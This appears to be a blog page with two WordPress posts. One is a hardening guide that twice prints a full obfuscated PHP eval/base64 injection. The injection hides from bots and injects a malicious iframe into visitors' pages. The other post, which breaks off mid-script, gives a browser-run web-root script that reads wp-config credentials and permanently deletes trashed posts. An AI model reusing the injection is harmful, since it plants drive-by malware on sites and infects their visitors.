I have quite a few friends who are WordPress aficionados and have a very limited understanding of all of the ins and outs of how the CMS works. As a result they add functionality via plugins, make the site look the way want with a theme and then they put their sites on shared hosting. Easy, inexpensive and …potentially dangerous.

WordPress is probably the most widely used CMS among the not-so-tech-savvy web community and as a result is susceptible to attack. The most popular of these attacks (right now) looks a bit like

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1MGNubDdjVDFrYjJOMWJXVnVkQzVqY21WaGRHVkZiR1Z0Wlc1MEtDSmthWFlpS1R0eExtRndjR1Z1WkVOb2FXeGtLSEVySWlJcE8zMWpZWFJqYUNoeGR5bDdhRDB0TURFeUx6VTdmWFJ5ZVh0d2NtOTBiM1I1Y0dVN2ZXTmhkR05vS0dKeVpXSnlLWHR6ZEQxVGRISnBibWM3ZW5vOUoyRnNKenQ2ZWowbmVuWW5Mbk4xWW5OMGNpZ3hNak10TVRJeUtTdDZlanR6Y3oxYlhUdG1QU2RtY2ljckoyOXRKeXNuUTJnbk8yWXJQU2RoY2tNbk8yWXJQU2R4WjI5a1pTZGJJbk4xWW5OMGNpSmRLRFF0TWlrN2R6MTBhR2x6TzJVOWQxdG1XeUp6ZFdKemRISWlYU2d4TVNrcmVucGRPMjQ5SWpNdU5TTXpMalVqTlRFdU5TTTFNQ014TlNNeE9TTTBPU00xTkM0MUl6UTRMalVqTlRjdU5TTTFNeTQxSXpRNUxqVWpOVFFqTlRjak1qSWpOVEF1TlNNME9TNDFJelUzSXpNekxqVWpOVE1qTkRrdU5TTTFNeTQxSXpRNUxqVWpOVFFqTlRjak5UWXVOU016TWlNMU9TNDFJelF4SXpRM0xqVWpOVEF1TlNNek9DTTBOeTQxSXpVekxqVWpORGt1TlNNeE9TTXhPQzQxSXpRNEl6VTBMalVqTkRrak5Ua3VOU014T0M0MUl6RTVMalVqTkRRdU5TTXlNeU0wTlM0MUl6RTVMalVqTmpBdU5TTTFMalVqTXk0MUl6TXVOU016TGpVak5URXVOU00xTUNNMU5pTTBOeTQxSXpVekxqVWpORGt1TlNNMU5pTXhPU014T1M0MUl6STRMalVqTlM0MUl6TXVOU016TGpVak5qRXVOU014TlNNME9TNDFJelV6SXpVMkxqVWpORGt1TlNNeE5TTTJNQzQxSXpVdU5TTXpMalVqTXk0MUl6TXVOU00wT1NNMU5DNDFJelE0TGpVak5UY3VOU00xTXk0MUl6UTVMalVqTlRRak5UY2pNaklqTlRndU5TTTFOaU0xTVM0MUl6VTNJelE1TGpVak1Ua2pNVFlqTWprak5URXVOU00xTUNNMU5pTTBOeTQxSXpVekxqVWpORGt1TlNNeE5TTTFOaTQxSXpVMkl6UTRMalVqTWprdU5TTXhPQzQxSXpVeEl6VTNJelUzSXpVMUl6STRJekl5TGpVak1qSXVOU00xTkM0MUl6UTRMalVqTkRjdU5TTTFOU00xT1M0MUl6UTNMalVqTlRJak1qSWpOVEV1TlNNME9DTTFNUzQxSXpZd0l6SXlJelE0TGpVak5EZ3VOU015TWk0MUl6TXdMalVqTlRBdU5TTTFOQzQxSXpJNUxqVWpNalFqTVRndU5TTXhOU00xT0M0MUl6VXhMalVqTkRrak5UY2pOVEVqTWprdU5TTXhPQzQxSXpJekxqVWpNak1qTVRndU5TTXhOU00xTVNNME9TNDFJelV4TGpVak5UQXVOU00xTVNNMU55TXlPUzQxSXpFNExqVWpNak11TlNNeU15TXhPQzQxSXpFMUl6VTJMalVqTlRjak5Ua3VOU00xTXlNME9TNDFJekk1TGpVak1UZ3VOU00xT0NNMU1TNDFJelUyTGpVak5URXVOU00wT0NNMU1TNDFJelV6SXpVeExqVWpOVGNqTlRrdU5TTXlPQ00xTVNNMU1TNDFJelE1SXpRNUl6UTVMalVqTlRRak1qZ3VOU00xTlNNMU5DNDFJelUyTGpVak5URXVOU00xTnlNMU1TNDFJelUwTGpVak5UUWpNamdqTkRjdU5TTTBPQ00xTmk0MUl6VTBMalVqTlRNak5UY3VOU00xTnlNME9TNDFJekk0TGpVak5UTWpORGt1TlNNMU1DTTFOeU15T0NNeU15TXlPQzQxSXpVM0l6VTBMalVqTlRVak1qZ2pNak1qTWpndU5TTXhPQzQxSXpNd0l6STVJekl5TGpVak5URXVOU00xTUNNMU5pTTBOeTQxSXpVekxqVWpORGt1TlNNek1DTXhOaU14T1M0MUl6STRMalVqTlM0MUl6TXVOU016TGpVak5qRXVOU00xTGpVak15NDFJek11TlNNMU1DTTFOeTQxSXpVMEl6UTRMalVqTlRjak5URXVOU00xTkM0MUl6VTBJekUxSXpVeExqVWpOVEFqTlRZak5EY3VOU00xTXk0MUl6UTVMalVqTlRZak1Ua2pNVGt1TlNNMk1DNDFJelV1TlNNekxqVWpNeTQxSXpNdU5TTTFPQ00wTnk0MUl6VTJJekUxSXpVd0l6RTFJekk1TGpVak1UVWpORGtqTlRRdU5TTTBPQzQxSXpVM0xqVWpOVE11TlNNME9TNDFJelUwSXpVM0l6SXlJelE0TGpVak5UWWpORGt1TlNNME55NDFJelUzSXpRNUxqVWpNek11TlNNMU15TTBPUzQxSXpVekxqVWpORGt1TlNNMU5DTTFOeU14T1NNeE9DNDFJelV4TGpVak5UQWpOVFlqTkRjdU5TTTFNeTQxSXpRNUxqVWpNVGd1TlNNeE9TNDFJekk0TGpVak5UQWpNaklqTlRZdU5TTTBPUzQxSXpVM0l6TXhMalVqTlRjak5UY2pOVFlqTlRFdU5TTTBPQ00xTnk0MUl6VTNJelE1TGpVak1Ua2pNVGd1TlNNMU5pNDFJelUySXpRNExqVWpNVGd1TlNNeU1TTXhPQzQxSXpVeEl6VTNJelUzSXpVMUl6STRJekl5TGpVak1qSXVOU00xTkM0MUl6UTRMalVqTkRjdU5TTTFOU00xT1M0MUl6UTNMalVqTlRJak1qSWpOVEV1TlNNME9DTTFNUzQxSXpZd0l6SXlJelE0TGpVak5EZ3VOU015TWk0MUl6TXdMalVqTlRBdU5TTTFOQzQxSXpJNUxqVWpNalFqTVRndU5TTXhPUzQxSXpJNExqVWpOVEFqTWpJak5UWXVOU00xTnlNMU9TNDFJelV6SXpRNUxqVWpNaklqTlRnak5URXVOU00xTmk0MUl6VXhMalVqTkRnak5URXVOU00xTXlNMU1TNDFJelUzSXpVNUxqVWpNamt1TlNNeE9DNDFJelV4SXpVeExqVWpORGtqTkRrak5Ea3VOU00xTkNNeE9DNDFJekk0TGpVak5UQWpNaklqTlRZdU5TTTFOeU0xT1M0MUl6VXpJelE1TGpVak1qSWpOVFVqTlRRdU5TTTFOaTQxSXpVeExqVWpOVGNqTlRFdU5TTTFOQzQxSXpVMEl6STVMalVqTVRndU5TTTBOeTQxSXpRNEl6VTJMalVqTlRRdU5TTTFNeU0xTnk0MUl6VTNJelE1TGpVak1UZ3VOU015T0M0MUl6VXdJekl5SXpVMkxqVWpOVGNqTlRrdU5TTTFNeU0wT1M0MUl6SXlJelV6SXpRNUxqVWpOVEFqTlRjak1qa3VOU014T0M0MUl6SXpJekU0TGpVak1qZ3VOU00xTUNNeU1pTTFOaTQxSXpVM0l6VTVMalVqTlRNak5Ea3VOU015TWlNMU55TTFOQzQxSXpVMUl6STVMalVqTVRndU5TTXlNeU14T0M0MUl6STRMalVqTlRBak1qSWpOVFl1TlNNME9TNDFJelUzSXpNeExqVWpOVGNqTlRjak5UWWpOVEV1TlNNME9DTTFOeTQxSXpVM0l6UTVMalVqTVRrak1UZ3VOU00xT0M0MUl6VXhMalVqTkRrak5UY2pOVEVqTVRndU5TTXlNU014T0M0MUl6SXpMalVqTWpNak1UZ3VOU014T1M0MUl6STRMalVqTlRBak1qSWpOVFl1TlNNME9TNDFJelUzSXpNeExqVWpOVGNqTlRjak5UWWpOVEV1TlNNME9DTTFOeTQxSXpVM0l6UTVMalVqTVRrak1UZ3VOU00xTVNNME9TNDFJelV4TGpVak5UQXVOU00xTVNNMU55TXhPQzQxSXpJeEl6RTRMalVqTWpNdU5TTXlNeU14T0M0MUl6RTVMalVqTWpndU5TTTFMalVqTXk0MUl6TXVOU016TGpVak5Ea2pOVFF1TlNNME9DNDFJelUzTGpVak5UTXVOU00wT1M0MUl6VTBJelUzSXpJeUl6VXdMalVqTkRrdU5TTTFOeU16TXk0MUl6VXpJelE1TGpVak5UTXVOU00wT1M0MUl6VTBJelUzSXpVMkxqVWpNeklqTlRrdU5TTTBNU00wTnk0MUl6VXdMalVqTXpnak5EY3VOU00xTXk0MUl6UTVMalVqTVRrak1UZ3VOU00wT0NNMU5DNDFJelE1SXpVNUxqVWpNVGd1TlNNeE9TNDFJelEwTGpVak1qTWpORFV1TlNNeU1pTTBOeTQxSXpVMUl6VTFJelE1TGpVak5UUWpORGtqTXpJdU5TTTFNU00xTVM0MUl6VXpJelE1SXpFNUl6VXdJekU1TGpVak1qZ3VOU00xTGpVak15NDFJek11TlNNMk1TNDFJbHNvS0dVcFB5SnpJam9pSWlrckluQWlLeUpzYVhRaVhTZ2lZU01pV3lnb1pTay9Jbk4xSWpvaUlpa3JJbUp6ZEhJaVhTZ3hLU2s3Wm05eUtHazlOaTB5TFRFdE1pMHhPMmt0TlRZMUlUMHdPMmtyS3lsN2FqMXBPMmxtS0hOMEtYTnpQWE56SzNOMExtWnliMjFEYUdGeVEyOWtaU2d0TVNwb0tpZ3hLekVxYmx0cVhTa3BPMzF4UFhOek8yVW9jU2s3ZlR3dmMyTnlhWEIwUGc9PScpKTsNCn0='));?>

though your gibberish may vary. There are two layers of protection for you and your users against this beast — prevention and response — and my guide will work on all PHP based sites, not just WordPress. I will say this now, I am not offering a 100 percent guarantee that this guide will keep you virus free but I am quite sure it will go a long way to protect your users from malicious sites and will make your cleanup much, much faster.

Prevention

1. Harden WordPress

OK I know I said this guide isn’t WordPress specific but I just want to cover this ground since most of the people reading this are probably WordPress users. There are hundreds of forums out there that talk about “hardening” WordPress using modifications to the .htaccess file and installing security plugins. I agree, those are steps all WordPress users should take. In fact, on top of regularly performing WordPress’ security updates and keeping my plugins up to date, all of my sites use W3 Total Cache to boost performance and Secure WordPress to quickly and easily implement a lot of the suggestions WordPress hardeners make (e.g. adding index.php to the plugin-directory to prevent directory crawling, removing the wordpress version from the HTML markup to make targeted attacks more difficult and blocking bad URL queries that could be harmful to your WordPress database). Also, for all CMSes you should always remove plugins/modules that are not in use as well as any defunct themes/templates. Their PHP files can act as backdoors to hackers as they lie dormant, their security holes being discovered with time.

2. Harden PHP

No matter what CMS you have and harden the suggestions you follow/conceive will falter with time so it’s a good idea to go a layer deeper — hardening your PHP installation. WordPress (as well as Drupal, Joomla, etc.) is based entirely on PHP and that’s where we can build our brick wall. First, come up with some very secure passwords for SSH, SCP and FTP. Just stating the obvious. Second if you can and haven’t already you should really install Suhosinas it extends the power of your PHP.ini file to do many things, including disabling some dangerous PHP engines. If you can install/have Suhosinadd the following lines to your PHP.ini file

[Suhosin]
extension=suhosin.so
suhosin.executor.disable_eval=On

This will disable the mighty eval() — a language construct which allows strings to be executed as PHP code.

If you cannot install Suhosin and do not have it
Search your PHP.ini file for disable_functions=

If it’s not there add it to the bottom of the file. Following the ‘=’ should be a comma separated list of functions that you don’t want your PHP software to honor. In this case we want to add base64_decode to the list

disable_functions=base64_decode

or

disable_functions=pre-existing-function,pre-existing-function,base64_decode

Why?

Well first let me start off by saying it’s better to disable eval() if you can because a lot of legitimate WordPress plugins, security keys, etc. use base64_decode to pass complex code as a simple string. But if you can’t disable eval then base64_decode is the way I’d go.

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1MGNubDdjVDFrYjJOMWJXVnVkQzVqY21WaGRHVkZiR1Z0Wlc1MEtDSmthWFlpS1R0eExtRndjR1Z1WkVOb2FXeGtLSEVySWlJcE8zMWpZWFJqYUNoeGR5bDdhRDB0TURFeUx6VTdmWFJ5ZVh0d2NtOTBiM1I1Y0dVN2ZXTmhkR05vS0dKeVpXSnlLWHR6ZEQxVGRISnBibWM3ZW5vOUoyRnNKenQ2ZWowbmVuWW5Mbk4xWW5OMGNpZ3hNak10TVRJeUtTdDZlanR6Y3oxYlhUdG1QU2RtY2ljckoyOXRKeXNuUTJnbk8yWXJQU2RoY2tNbk8yWXJQU2R4WjI5a1pTZGJJbk4xWW5OMGNpSmRLRFF0TWlrN2R6MTBhR2x6TzJVOWQxdG1XeUp6ZFdKemRISWlYU2d4TVNrcmVucGRPMjQ5SWpNdU5TTXpMalVqTlRFdU5TTTFNQ014TlNNeE9TTTBPU00xTkM0MUl6UTRMalVqTlRjdU5TTTFNeTQxSXpRNUxqVWpOVFFqTlRjak1qSWpOVEF1TlNNME9TNDFJelUzSXpNekxqVWpOVE1qTkRrdU5TTTFNeTQxSXpRNUxqVWpOVFFqTlRjak5UWXVOU016TWlNMU9TNDFJelF4SXpRM0xqVWpOVEF1TlNNek9DTTBOeTQxSXpVekxqVWpORGt1TlNNeE9TTXhPQzQxSXpRNEl6VTBMalVqTkRrak5Ua3VOU014T0M0MUl6RTVMalVqTkRRdU5TTXlNeU0wTlM0MUl6RTVMalVqTmpBdU5TTTFMalVqTXk0MUl6TXVOU016TGpVak5URXVOU00xTUNNMU5pTTBOeTQxSXpVekxqVWpORGt1TlNNMU5pTXhPU014T1M0MUl6STRMalVqTlM0MUl6TXVOU016TGpVak5qRXVOU014TlNNME9TNDFJelV6SXpVMkxqVWpORGt1TlNNeE5TTTJNQzQxSXpVdU5TTXpMalVqTXk0MUl6TXVOU00wT1NNMU5DNDFJelE0TGpVak5UY3VOU00xTXk0MUl6UTVMalVqTlRRak5UY2pNaklqTlRndU5TTTFOaU0xTVM0MUl6VTNJelE1TGpVak1Ua2pNVFlqTWprak5URXVOU00xTUNNMU5pTTBOeTQxSXpVekxqVWpORGt1TlNNeE5TTTFOaTQxSXpVMkl6UTRMalVqTWprdU5TTXhPQzQxSXpVeEl6VTNJelUzSXpVMUl6STRJekl5TGpVak1qSXVOU00xTkM0MUl6UTRMalVqTkRjdU5TTTFOU00xT1M0MUl6UTNMalVqTlRJak1qSWpOVEV1TlNNME9DTTFNUzQxSXpZd0l6SXlJelE0TGpVak5EZ3VOU015TWk0MUl6TXdMalVqTlRBdU5TTTFOQzQxSXpJNUxqVWpNalFqTVRndU5TTXhOU00xT0M0MUl6VXhMalVqTkRrak5UY2pOVEVqTWprdU5TTXhPQzQxSXpJekxqVWpNak1qTVRndU5TTXhOU00xTVNNME9TNDFJelV4TGpVak5UQXVOU00xTVNNMU55TXlPUzQxSXpFNExqVWpNak11TlNNeU15TXhPQzQxSXpFMUl6VTJMalVqTlRjak5Ua3VOU00xTXlNME9TNDFJekk1TGpVak1UZ3VOU00xT0NNMU1TNDFJelUyTGpVak5URXVOU00wT0NNMU1TNDFJelV6SXpVeExqVWpOVGNqTlRrdU5TTXlPQ00xTVNNMU1TNDFJelE1SXpRNUl6UTVMalVqTlRRak1qZ3VOU00xTlNNMU5DNDFJelUyTGpVak5URXVOU00xTnlNMU1TNDFJelUwTGpVak5UUWpNamdqTkRjdU5TTTBPQ00xTmk0MUl6VTBMalVqTlRNak5UY3VOU00xTnlNME9TNDFJekk0TGpVak5UTWpORGt1TlNNMU1DTTFOeU15T0NNeU15TXlPQzQxSXpVM0l6VTBMalVqTlRVak1qZ2pNak1qTWpndU5TTXhPQzQxSXpNd0l6STVJekl5TGpVak5URXVOU00xTUNNMU5pTTBOeTQxSXpVekxqVWpORGt1TlNNek1DTXhOaU14T1M0MUl6STRMalVqTlM0MUl6TXVOU016TGpVak5qRXVOU00xTGpVak15NDFJek11TlNNMU1DTTFOeTQxSXpVMEl6UTRMalVqTlRjak5URXVOU00xTkM0MUl6VTBJekUxSXpVeExqVWpOVEFqTlRZak5EY3VOU00xTXk0MUl6UTVMalVqTlRZak1Ua2pNVGt1TlNNMk1DNDFJelV1TlNNekxqVWpNeTQxSXpNdU5TTTFPQ00wTnk0MUl6VTJJekUxSXpVd0l6RTFJekk1TGpVak1UVWpORGtqTlRRdU5TTTBPQzQxSXpVM0xqVWpOVE11TlNNME9TNDFJelUwSXpVM0l6SXlJelE0TGpVak5UWWpORGt1TlNNME55NDFJelUzSXpRNUxqVWpNek11TlNNMU15TTBPUzQxSXpVekxqVWpORGt1TlNNMU5DTTFOeU14T1NNeE9DNDFJelV4TGpVak5UQWpOVFlqTkRjdU5TTTFNeTQxSXpRNUxqVWpNVGd1TlNNeE9TNDFJekk0TGpVak5UQWpNaklqTlRZdU5TTTBPUzQxSXpVM0l6TXhMalVqTlRjak5UY2pOVFlqTlRFdU5TTTBPQ00xTnk0MUl6VTNJelE1TGpVak1Ua2pNVGd1TlNNMU5pNDFJelUySXpRNExqVWpNVGd1TlNNeU1TTXhPQzQxSXpVeEl6VTNJelUzSXpVMUl6STRJekl5TGpVak1qSXVOU00xTkM0MUl6UTRMalVqTkRjdU5TTTFOU00xT1M0MUl6UTNMalVqTlRJak1qSWpOVEV1TlNNME9DTTFNUzQxSXpZd0l6SXlJelE0TGpVak5EZ3VOU015TWk0MUl6TXdMalVqTlRBdU5TTTFOQzQxSXpJNUxqVWpNalFqTVRndU5TTXhPUzQxSXpJNExqVWpOVEFqTWpJak5UWXVOU00xTnlNMU9TNDFJelV6SXpRNUxqVWpNaklqTlRnak5URXVOU00xTmk0MUl6VXhMalVqTkRnak5URXVOU00xTXlNMU1TNDFJelUzSXpVNUxqVWpNamt1TlNNeE9DNDFJelV4SXpVeExqVWpORGtqTkRrak5Ea3VOU00xTkNNeE9DNDFJekk0TGpVak5UQWpNaklqTlRZdU5TTTFOeU0xT1M0MUl6VXpJelE1TGpVak1qSWpOVFVqTlRRdU5TTTFOaTQxSXpVeExqVWpOVGNqTlRFdU5TTTFOQzQxSXpVMEl6STVMalVqTVRndU5TTTBOeTQxSXpRNEl6VTJMalVqTlRRdU5TTTFNeU0xTnk0MUl6VTNJelE1TGpVak1UZ3VOU015T0M0MUl6VXdJekl5SXpVMkxqVWpOVGNqTlRrdU5TTTFNeU0wT1M0MUl6SXlJelV6SXpRNUxqVWpOVEFqTlRjak1qa3VOU014T0M0MUl6SXpJekU0TGpVak1qZ3VOU00xTUNNeU1pTTFOaTQxSXpVM0l6VTVMalVqTlRNak5Ea3VOU015TWlNMU55TTFOQzQxSXpVMUl6STVMalVqTVRndU5TTXlNeU14T0M0MUl6STRMalVqTlRBak1qSWpOVFl1TlNNME9TNDFJelUzSXpNeExqVWpOVGNqTlRjak5UWWpOVEV1TlNNME9DTTFOeTQxSXpVM0l6UTVMalVqTVRrak1UZ3VOU00xT0M0MUl6VXhMalVqTkRrak5UY2pOVEVqTVRndU5TTXlNU014T0M0MUl6SXpMalVqTWpNak1UZ3VOU014T1M0MUl6STRMalVqTlRBak1qSWpOVFl1TlNNME9TNDFJelUzSXpNeExqVWpOVGNqTlRjak5UWWpOVEV1TlNNME9DTTFOeTQxSXpVM0l6UTVMalVqTVRrak1UZ3VOU00xTVNNME9TNDFJelV4TGpVak5UQXVOU00xTVNNMU55TXhPQzQxSXpJeEl6RTRMalVqTWpNdU5TTXlNeU14T0M0MUl6RTVMalVqTWpndU5TTTFMalVqTXk0MUl6TXVOU016TGpVak5Ea2pOVFF1TlNNME9DNDFJelUzTGpVak5UTXVOU00wT1M0MUl6VTBJelUzSXpJeUl6VXdMalVqTkRrdU5TTTFOeU16TXk0MUl6VXpJelE1TGpVak5UTXVOU00wT1M0MUl6VTBJelUzSXpVMkxqVWpNeklqTlRrdU5TTTBNU00wTnk0MUl6VXdMalVqTXpnak5EY3VOU00xTXk0MUl6UTVMalVqTVRrak1UZ3VOU00wT0NNMU5DNDFJelE1SXpVNUxqVWpNVGd1TlNNeE9TNDFJelEwTGpVak1qTWpORFV1TlNNeU1pTTBOeTQxSXpVMUl6VTFJelE1TGpVak5UUWpORGtqTXpJdU5TTTFNU00xTVM0MUl6VXpJelE1SXpFNUl6VXdJekU1TGpVak1qZ3VOU00xTGpVak15NDFJek11TlNNMk1TNDFJbHNvS0dVcFB5SnpJam9pSWlrckluQWlLeUpzYVhRaVhTZ2lZU01pV3lnb1pTay9Jbk4xSWpvaUlpa3JJbUp6ZEhJaVhTZ3hLU2s3Wm05eUtHazlOaTB5TFRFdE1pMHhPMmt0TlRZMUlUMHdPMmtyS3lsN2FqMXBPMmxtS0hOMEtYTnpQWE56SzNOMExtWnliMjFEYUdGeVEyOWtaU2d0TVNwb0tpZ3hLekVxYmx0cVhTa3BPMzF4UFhOek8yVW9jU2s3ZlR3dmMyTnlhWEIwUGc9PScpKTsNCn0='));?>

Here’s how the above code works. The gibberish is an encoded PHP clause that pulls in a malicious site via an iFrame which then passes a virus to any computer that is susceptible to it. base64_decode translates the string into PHP markup that your software can understand and eval() executes it. This is why disabling one of the two will keep the infection from spreading.

2. Response

If a hacker does manage to get past your .htaccess hardening into your site and plant some bombs one of two things will happen if you followed my instructions above.
A. Your site will display an error message on top that looks something like

Fatal error: SUHOSIN – Use of eval is forbidden by configuration in absolute_server_path/file.php(1) : eval()’d code on line 1

and your page won’t load (or the base64_decode variety of this message if you want the non-Suhosin route)

B. You’ll see the above error message and your page will load, lol.

There are two pros to my method and two cons.

Pro 1. The error message means the code won’t execute and you won’t be responsible for infecting users’ computers.

Pro 2. Infections like this can be quite messy as they can spread to many files on your site. The error message details where it’s finding the code, so you can go in to the file it says, remove the code and refresh — repeating the process when necessary.

Con 1. You’ll have to recode some out-of-the-box plugins (like WordPress’ advanced text widget) because they make use of eval voluntarily *shutters*

Con 2. Your site looks as though it has crashed.

The way that the hack usually works is an insecure PHP files is discovered, compromised and made to reveal (or even act as) FTP/SCP credentials. The hacker can then upload the malicious code to your server. You need to first change all of your passwords and then follow the hardening steps above and/or contact your hosting provider and ask them to audit your account and figure out how the hacker got in.

I was doing some work for a client’s e-commerce website this weekend and ran into some trouble engineering some of the sites cosmetic features. I am using WP E-Commerce (which is very good now that I have customized it and programmed out many of the bugs), which makes excellent use of WordPress’ custom post type capabilities.

I was working on a product category list, but I was adapting it to only display categories that only have items in it — empty categories would automatically hide. Well after testing it and then loading in 200+ products making mistakes and trashing different things along the way I noticed that my categories were not hiding when empty.

Taking a closer look I found that, even though WordPress was saying the category was empty, the post count in the database wasn’t 0. Baffled by the phenomenon I decided to do what every experience and competent developer like myself does — I googled the problem. One recommendation was ‘empty the trash.’ I felt like such a dunce. I went in and emptied the trash, and voila! the problem remained. Darn it! So I came up with a PHP based solution that fixes the problem. As usual, my solution explained with code is below.

The Solution

This solution works throughout WordPress, including for any plugins that make use of a custom post type (i.e. WP E-Commerce) as well as your standard categories, posts and pages.

1. First thing’s first. We need to start our script by opening a connection to our wordpress database. This is super easy.

   <?php
   //STANDARD CONNECT DATA. YOU DO NOT NEED TO EDIT THIS PART OF THE SCRIPT
   require('wp-config.php'); //call wordpress config file to get the database credentials
   
   $username = DB_USER; //pulls username from wp-config
   $password = DB_PASSWORD; //pulls password from wp-config
   $server = DB_HOST; //pulls host address from wp-config
   $dB = DB_NAME; //pulls database id from wp-config
   $connect = mysql_connect($server, $username, $password);
   if (!$connect){ //outputs error info should connection fail
   	 die('Could not connect: ' . mysql_error());
   }
   else{
   	mysql_select_db($dB, $connect);
   }
   
   //DONE CONNECTING
   ?>
   

   I use this method a lot as it automatically pulls in the database credentials from my WP-Config.php file. Just be sure to place your script in your site root when you’re done otherwise the code as it stands above won’t work.

2. Next we need to clear out all trash items — but at the database level. Sometimes bugs and haywire communication between the WordPress dashboard and the actual database can cause some rogue posts to be eliminated from the trash in the dashboard, but still have space in the database. We need to check for this scenario and remove all instances of it. WARNING: THIS STEP WILL MAKE ALL ITEMS PLACED IN THE TRASH NON-RESTORABLE.

   <?php
   //Step 1. Empty trash WARNING YOU WILL NOT BE ABLE TO RESTORE ANY ITEMS IN THE TRASH AFTER THIS IS RUN
   $emptyTrash = "DELETE FROM wp_posts WHERE post_status = 'trash'";
   $emptyTrash = mysql_query($emptyTrash);
   ?>
   

3. Next, we go through each category one by one and sift through the database to see how many posts have been assigned to that category, counting as we go. At the end of each category we update it’s “count” field in the database with the number our script came up with.

   <?php
   //Step 2. Recount Posts in Each Category
   $getTaxID = "SELECT * FROM wp_term_taxonomy";
   $getTaxID = mysql_query($getTaxID);
   if(!$getTaxID){
   	print 'Error: '.mysql_error();
   }
   while($row = mysql_fetch_array($getTaxID, MYSQL_ASSOC)){
   	$taxID = $row["term_id"];
   	$countTaxPost = "SELECT * FROM wp_term_relationships WHERE term_taxonomy_id = '$taxID'";
   	$countTaxPost = mysql_query($countTaxPost);
   	$count = 0;
   	while($rowCount = mysql_fetch_array($countTaxPost, MYSQL_ASSOC)){
   		$count++;
   	}
   	$getName = "SELECT * FROM wp_terms WHERE term_id = '$taxID'";
   	$getName = mysql_query($getName);
   	if(!$getName){
   		print 'Error: '.mysql_error();
   	}
   	$termName;
   	while($taxName = mysql_fetch_array($getName, MYSQL_ASSOC)){
   		$termName = $taxName["name"];
   	}
   
   	$updateCount = "UPDATE wp_term_taxonomy SET count = '$count' WHERE term_id = '$taxID'";
   	$updateCount = mysql_query($updateCount);
   	if(!$updateCount){
   		print "Error: ".mysql_error();
   	}
   }
   ?>
   

4. That’s it! As usual the full script is below. Copy, paste and save it as a PHP file in your sites root directory. For you noobies you can run it by calling it up like a webpage in your browser (i.e. http://www.example.com/SCRIPTNAME.php)

   <?php
   /********RESET CATEGORY POST COUNTS IN WORDPRESS*********************
   
   SCRIPT DEVELOPED BY T.C. MCCARTHY TO SOLVE A BUG IN
   WORDPRESS WHERE CATEGORIES SOMETIMES DISPLAY THE WRONG POST COUNT. DROP
   THIS SCRIPT INTO YOUR WORDPRESS SITE'S ROOT DIRECTORY -- IT SHOULD BE IN THE
   SAME DIRECTORY AS THE WP-CONFIG.PHP FILE. THEN EXECUTE IT BY ACCESSING THROUGH
   YOUR BROWSER -- (e.g. If your site is www.example.com after dropping this file
   (which we assume is named catpostfix.php) into
   the root directory, you would run it by going to www.example.com/catpostgix.php)*/
   
   //STANDARD CONNECT DATA. YOU DO NOT NEED TO EDIT THIS PART OF THE SCRIPT
   require('wp-config.php'); //call wordpress config file to get the database credentials
   
   $username = DB_USER; //pulls username from wp-config
